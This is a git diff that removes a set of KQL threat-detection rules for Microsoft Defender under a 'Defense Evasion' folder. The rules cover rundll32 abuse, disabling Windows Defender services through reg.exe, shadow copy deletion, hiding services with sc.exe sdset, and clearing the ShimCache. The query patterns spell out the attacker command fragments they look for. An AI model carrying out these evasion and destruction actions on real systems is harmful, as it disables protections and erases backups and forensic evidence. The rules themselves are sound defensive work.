-| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (not((ProcessCommandLine =~ "" or ((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".cpl\"" or ProcessCommandLine contains ".cpl'" or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".dll'" or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf," or ProcessCommandLine contains ".inf\"" or ProcessCommandLine contains ".inf'") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".inf")) or ProcessCommandLine contains " -localserver " or isnull(ProcessCommandLine) or ((ProcessCommandLine contains ":\\Windows\\Installer\\" and ProcessCommandLine contains ".tmp" and ProcessCommandLine contains "zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))) and (not((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessCommandLine contains "\\EDGEMITMP_" and InitiatingProcessCommandLine contains ".tmp\\setup.exe" and InitiatingProcessCommandLine contains "--install-archive=" and InitiatingProcessCommandLine contains "--previous-version=" and InitiatingProcessCommandLine contains "--msedgewebview --verbose-logging --do-not-launch-msedge --user-level")))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql b/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql
deleted file mode 100644
index 11cc1e9b..00000000
--- a/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/27
-// Level: high
-// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "\\rundll32.exe" or ProcessCommandLine endswith "\\rundll32.exe\"" or ProcessCommandLine endswith "\\rundll32") and (not((InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Microsoft\\Edge\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql b/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql
deleted file mode 100644
index 756a6a72..00000000
--- a/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec
-// Date: 2022/04/28
-// Level: medium
-// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
-// Tags: attack.t1218.011, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "InstallScreenSaver" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Internet_Connection.kql b/Defense Evasion/Rundll32_Internet_Connection.kql
deleted file mode 100644
index 2acd0757..00000000
--- a/Defense Evasion/Rundll32_Internet_Connection.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/11/04
-// Level: medium
-// Description: Detects a rundll32 that communicates with public IP addresses
-// Tags: attack.defense_evasion, attack.t1218.011, attack.execution
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql b/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql
deleted file mode 100644
index 0e6f7b7c..00000000
--- a/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: CD_ROM_
-// Date: 2022/05/21
-// Level: medium
-// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe") and (not((ProcessCommandLine contains " C:\\Windows\\System32\\" or ProcessCommandLine endswith " -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617")))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_UNC_Path_Execution.kql b/Defense Evasion/Rundll32_UNC_Path_Execution.kql
deleted file mode 100644
index 17761d13..00000000
--- a/Defense Evasion/Rundll32_UNC_Path_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects rundll32 execution where the DLL is located on a remote location (share)
-// Tags: attack.defense_evasion, attack.execution, attack.t1021.002, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Defense Evasion/SCR_File_Write_Event.kql b/Defense Evasion/SCR_File_Write_Event.kql
deleted file mode 100644
index 037d4717..00000000
--- a/Defense Evasion/SCR_File_Write_Event.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2022/04/27
-// Level: medium
-// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceFileEvents
-| where FolderPath endswith ".scr" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\")))
\ No newline at end of file
diff --git a/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql b/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql
deleted file mode 100644
index 8cf3471a..00000000
--- a/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.communitly
-// Date: 2020/10/13
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql b/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql
deleted file mode 100644
index 94cb9201..00000000
--- a/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
-// Date: 2022/08/08
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " delete " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/ScreenSaver_Registry_Key_Set.kql b/Defense Evasion/ScreenSaver_Registry_Key_Set.kql
deleted file mode 100644
index c98e2ab2..00000000
--- a/Defense Evasion/ScreenSaver_Registry_Key_Set.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
-// Date: 2022/05/04
-// Level: medium
-// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (RegistryValueData endswith ".scr" and RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE") and (not((RegistryValueData contains "C:\\Windows\\System32\\" or RegistryValueData contains "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql b/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql
deleted file mode 100644
index ca2477a7..00000000
--- a/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2022/06/15
-// Level: medium
-// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck"
\ No newline at end of file
diff --git a/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql b/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql
deleted file mode 100644
index 620fe02e..00000000
--- a/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nextron Systems
-// Date: 2022/06/01
-// Level: high
-// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
-// Tags: attack.defense_evasion, attack.t1036, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\calc.exe") and InitiatingProcessFolderPath endswith "\\sdiagnhost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql b/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql
deleted file mode 100644
index 0e33ccc2..00000000
--- a/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim
-// Date: 2021/07/14
-// Level: high
-// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\AppIDSvc" or ProcessCommandLine contains "\\MsMpSvc" or ProcessCommandLine contains "\\NisSrv" or ProcessCommandLine contains "\\SecurityHealthService" or ProcessCommandLine contains "\\Sense" or ProcessCommandLine contains "\\UsoSvc" or ProcessCommandLine contains "\\WdBoot" or ProcessCommandLine contains "\\WdFilter" or ProcessCommandLine contains "\\WdNisDrv" or ProcessCommandLine contains "\\WdNisSvc" or ProcessCommandLine contains "\\WinDefend" or ProcessCommandLine contains "\\wscsvc" or ProcessCommandLine contains "\\wuauserv") and (ProcessCommandLine contains "d 4" and ProcessCommandLine contains "v Start")) and (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add")
\ No newline at end of file
diff --git a/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql b/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql
deleted file mode 100644
index 6fbf2187..00000000
--- a/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/05
-// Level: high
-// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
-This behavior has been observed in-the-wild by different threat actors.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " /n " and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe") and (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql b/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql
deleted file mode 100644
index d968330c..00000000
--- a/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024/02/05
-// Level: medium
-// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
-These files are used by the "iexpress.exe" utility in order to create self extracting packages.
-Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") and FolderPath endswith ".sed"
\ No newline at end of file
diff --git a/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql b/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql
deleted file mode 100644
index 2b8c5e74..00000000
--- a/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), frack113
-// Date: 2022/05/02
-// Level: high
-// Description: Detect the creation of a service with a service binary located in a suspicious directory
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\") and RegistryKey endswith "\\Start" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services") or ((RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\") and RegistryKey endswith "\\ImagePath" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services")) and (not((InitiatingProcessFolderPath contains "\\Common Files\\" and InitiatingProcessFolderPath contains "\\Temp\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
deleted file mode 100644
index 04c45340..00000000
--- a/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql b/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql
deleted file mode 100644
index b4ed8585..00000000
--- a/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " delete " and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\services\\"
\ No newline at end of file
diff --git a/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index a2adcfc1..00000000
--- a/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql b/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
deleted file mode 100644
index c22f6141..00000000
--- a/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/04
-// Level: medium
-// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql b/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql
deleted file mode 100644
index dc89c692..00000000
--- a/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: medium
-// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql b/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql
deleted file mode 100644
index fd22f26f..00000000
--- a/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
-
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " +s" and (ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs") and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") and (ProcessCommandLine contains " %" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\Windows\\TEMP\\" and ProcessCommandLine contains ".exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql b/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
deleted file mode 100644
index ef8ae60e..00000000
--- a/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
-// Date: 2019/10/22
-// Level: high
-// Description: Shadow Copies deletion using operating systems utilities
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE"))
\ No newline at end of file
diff --git a/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql b/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql
deleted file mode 100644
index 572e8c51..00000000
--- a/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/11/24
-// Level: high
-// Description: Detects shell32.dll executing a DLL in a suspicious directory
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql b/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql
deleted file mode 100644
index 3d4deb59..00000000
--- a/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1546.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)")))
\ No newline at end of file
diff --git a/Defense Evasion/ShimCache_Flush.kql b/Defense Evasion/ShimCache_Flush.kql
deleted file mode 100644
index f8a6db43..00000000
--- a/Defense Evasion/ShimCache_Flush.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/01
-// Level: high
-// Description: Detects actions that clear the local ShimCache and remove forensic evidence
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "apphelp.dll") and (ProcessCommandLine contains "ShimFlushCache" or ProcessCommandLine contains "#250")) or ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "kernel32.dll") and (ProcessCommandLine contains "BaseFlushAppcompatCache" or ProcessCommandLine contains "#46"))
\ No newline at end of file
diff --git a/Defense Evasion/Sideloading_Link.EXE.kql b/Defense Evasion/Sideloading_Link.EXE.kql
deleted file mode 100644
index 86e7b9e1..00000000
--- a/Defense Evasion/Sideloading_Link.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: medium
-// Description: Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "LINK /" and FolderPath endswith "\\link.exe") and (not((InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql b/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql
deleted file mode 100644
index e86795a7..00000000
--- a/Defense Evasion/Start_of_NT_Virtual_DOS_Machine.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/07/16
-// Level: medium
-// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath endswith "\\ntvdm.exe" or FolderPath endswith "\\csrstub.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Suspect_Svchost_Activity.kql b/Defense Evasion/Suspect_Svchost_Activity.kql
deleted file mode 100644
index 0c14e8e3..00000000
--- a/Defense Evasion/Suspect_Svchost_Activity.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: David Burkett, @signalblur
-// Date: 2019/12/28
-// Level: high
-// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine))))
\ No newline at end of file
